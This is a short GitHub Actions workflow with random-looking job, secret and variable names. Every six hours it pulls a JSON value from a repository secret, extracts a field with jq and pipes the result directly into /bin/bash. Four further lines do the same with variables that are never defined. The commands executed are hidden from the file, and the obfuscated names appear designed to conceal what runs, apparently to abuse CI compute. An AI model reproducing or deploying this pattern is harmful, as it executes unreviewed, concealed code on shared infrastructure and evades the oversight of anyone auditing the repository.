name: changweiwu3891

on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: changweiwu3891
        env:
          zrwpp24007: ${{ secrets.zrwpp24007 }}
        run: |
          echo $zrwpp24007 | jq -r .gt07 | /bin/bash
          echo $ofabx688 | jq -r .glz80292 | /bin/bash
          echo $pf01608 | jq -r .fipcs00508 | /bin/bash
          echo $cwy16447 | jq -r .rviqm012 | /bin/bash
          echo $yrj6 | jq -r .euyny8 | /bin/bash

